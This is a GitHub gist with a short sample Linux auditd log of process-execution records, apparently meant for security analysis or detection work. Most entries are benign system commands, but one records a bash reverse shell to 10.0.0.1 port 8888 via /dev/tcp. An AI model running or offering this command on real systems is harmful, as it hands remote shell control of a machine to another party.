Skip to content

Instantly share code, notes, and snippets.

@dtrizna

dtrizna/auditd_sample.log

Created September 20, 2022 10:58
Show Gist options
  • Save dtrizna/ce72b897a6001875fd81ad56c62da713 to your computer and use it in GitHub Desktop.
Save dtrizna/ce72b897a6001875fd81ad56c62da713 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
auditd_sample.log
type=EXECVE msg=audit(1648469217.476:296): argc=2 a0="readlink" a1="/usr/bin/python"
type=EXECVE msg=audit(1648469217.484:298): argc=4 a0="grep" a1="-q" a2="^ID.*=.*ubuntu" a3="/etc/os-release"
type=EXECVE msg=audit(1648469217.512:299): argc=3 a0="tput" a1="setaf" a2="1"
type=EXECVE msg=audit(1648469218.312:300): argc=4 a0="/bin/sh" a1="-c" a3="/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261"
type=EXECVE msg=audit(1648469219.440:302): argc=3 a0="/usr/lib/x86_64-linux-gnu/utempter/utempter" a1="add" a2="tmux(3353).%1"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment